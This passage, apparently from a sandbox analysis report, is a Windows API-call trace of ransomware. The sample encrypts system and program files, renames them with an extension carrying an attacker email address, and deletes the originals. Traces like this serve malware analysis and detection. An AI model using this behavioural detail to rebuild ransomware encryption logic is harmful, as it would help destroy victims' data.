hTemplateFile=0x0) returned 0x2d4 [0140.700] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=811936) returned 1 [0140.700] CloseHandle (hObject=0x2d4) returned 1 [0140.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0140.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\memtest.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.700] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.700] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.701] ResetEvent (hEvent=0x29c) returned 1 [0140.701] SetEvent (hEvent=0x2a0) returned 1 [0140.701] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.701] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=75616) returned 1 [0140.701] CloseHandle (hObject=0x2e0) returned 1 [0140.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0140.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.702] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.702] ResetEvent (hEvent=0x29c) returned 1 [0140.702] SetEvent (hEvent=0x2a0) returned 1 [0140.702] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.702] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.702] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=45472) returned 1 [0140.702] CloseHandle (hObject=0x2e0) returned 1 [0140.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui")) returned 0x20 [0140.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.702] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.703] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0141.008] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.008] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.208] SetEvent (hEvent=0x288) returned 1 [0141.208] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.208] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.209] SetEvent (hEvent=0x288) returned 1 [0141.209] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.210] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=15984) returned 1 [0141.210] CloseHandle (hObject=0x2d8) returned 1 [0141.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 0x20 [0141.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.210] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.210] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.210] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.210] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.212] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac31b0) returned 1 [0141.212] CryptSetKeyParam (hKey=0xac31b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.212] ReadFile (in: hFile=0x2d8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x3e70, lpOverlapped=0x0) returned 1 [0141.229] CryptEncrypt (in: hKey=0xac31b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e80, dwBufLen=0x3e80 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e80) returned 1 [0141.230] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x3e80, lpOverlapped=0x0) returned 1 [0141.232] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2df0) returned 1 [0141.232] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.232] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0141.232] CryptDestroyKey (hKey=0xac2df0) returned 1 [0141.232] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0141.232] CryptDestroyKey (hKey=0xac31b0) returned 1 [0141.232] CloseHandle (hObject=0x2d8) returned 1 [0141.232] CloseHandle (hObject=0x2f8) returned 1 [0141.233] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 1 [0141.234] SetEvent (hEvent=0x288) returned 1 [0141.234] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.235] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=75776) returned 1 [0141.235] CloseHandle (hObject=0x2f8) returned 1 [0141.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe")) returned 0x20 [0141.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.236] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.236] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.236] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.236] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3030) returned 1 [0141.236] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.236] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x12800, lpOverlapped=0x0) returned 1 [0141.239] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x12810, dwBufLen=0x12810 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x12810) returned 1 [0141.239] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x12810, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x12810, lpOverlapped=0x0) returned 1 [0141.241] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d70) returned 1 [0141.241] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.241] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0141.241] CryptDestroyKey (hKey=0xac2d70) returned 1 [0141.241] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0141.242] CryptDestroyKey (hKey=0xac3030) returned 1 [0141.242] CloseHandle (hObject=0x2f8) returned 1 [0141.242] CloseHandle (hObject=0x2d8) returned 1 [0141.244] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe")) returned 1 [0141.245] SetEvent (hEvent=0x288) returned 1 [0141.245] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.246] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=18624) returned 1 [0141.246] CloseHandle (hObject=0x2d8) returned 1 [0141.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 0x20 [0141.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.246] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.246] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.941] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e30) returned 1 [0141.941] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.942] ReadFile (in: hFile=0x2d8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x48c0, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x48d0, dwBufLen=0x48d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x48d0) returned 1 [0141.946] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x48d0, lpOverlapped=0x0) returned 1 [0141.947] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3170) returned 1 [0141.947] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.947] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0141.948] CryptDestroyKey (hKey=0xac3170) returned 1 [0141.948] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0141.948] CryptDestroyKey (hKey=0xac2e30) returned 1 [0141.948] CloseHandle (hObject=0x2d8) returned 1 [0141.948] CloseHandle (hObject=0x2f4) returned 1 [0141.949] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 1 [0141.950] SetEvent (hEvent=0x288) returned 1 [0141.950] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.950] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=21184) returned 1 [0141.950] CloseHandle (hObject=0x2f4) returned 1 [0141.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x20 [0141.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.951] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.951] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.958] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0141.958] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.958] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x52c0, lpOverlapped=0x0) returned 1 [0141.963] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x52d0, dwBufLen=0x52d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x52d0) returned 1 [0141.963] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x52d0, lpOverlapped=0x0) returned 1 [0141.965] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac30f0) returned 1 [0141.965] CryptSetKeyParam (hKey=0xac30f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.965] CryptEncrypt (in: hKey=0xac30f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0141.965] CryptDestroyKey (hKey=0xac30f0) returned 1 [0141.965] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x122, lpOverlapped=0x0) returned 1 [0141.965] CryptDestroyKey (hKey=0xac33f0) returned 1 [0141.965] CloseHandle (hObject=0x2f4) returned 1 [0141.965] CloseHandle (hObject=0x2f8) returned 1 [0141.966] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 1 [0141.967] SetEvent (hEvent=0x288) returned 1 [0141.968] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.968] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=19136) returned 1 [0141.968] CloseHandle (hObject=0x2f8) returned 1 [0141.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x20 [0141.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.968] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.968] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.969] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, 